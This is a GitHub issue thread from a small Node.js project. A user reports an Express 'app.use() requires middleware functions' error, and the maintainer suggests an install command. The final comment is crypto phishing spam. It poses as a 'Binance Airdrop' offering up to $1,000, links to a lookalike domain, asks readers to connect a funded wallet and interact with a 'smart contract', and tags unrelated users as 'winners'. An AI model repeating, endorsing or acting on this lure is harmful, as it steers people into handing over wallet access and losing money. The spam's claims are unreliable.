### ISSUE TITLE
Errors

### ISSUE THREAD

**Issue by zenny** [kai-wegner/catchi#1]
Hi,

Referred to your repo to  me by https://github.com/senshu.

However when I try to run, got following errors (I am new to nodejs kinda thing):

 $ ./startServer.sh 
/home/zenny/Downloads/catchi/node_modules/express/lib/application.js:209
    throw new TypeError('app.use() requires middleware functions');
    ^

TypeError: app.use() requires middleware functions
    at EventEmitter.use (/home/zenny/Downloads/catchi/node_modules/express/lib/application.js:209:11)
    at Object.<anonymous> (/home/zenny/Downloads/catchi/webapp/app.js:29:5)
    at Module._compile (module.js:435:26)
    at Object.Module._extensions..js (module.js:442:10)
    at Module.load (module.js:356:32)
    at Function.Module._load (module.js:311:12)
    at Module.require (module.js:366:17)
    at require (module.js:385:17)
    at Object.<anonymous> (/home/zenny/Downloads/catchi/webapp/bin/www:7:11)
    at Module._compile (module.js:435:26)

Thanks!

/z

**Comment by kai-wegner** [comment]
Hi, sorry for the late response.
Try 
``bash
npm install && cd webapp && npm install && bower install
``
I should really write a README.md ... maybe this weekend. :+1:

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @AndreiShybin, @devxleo, @omarkarim, @LijinPengT, @bhaumin, @CHENBAE, @codepunkt
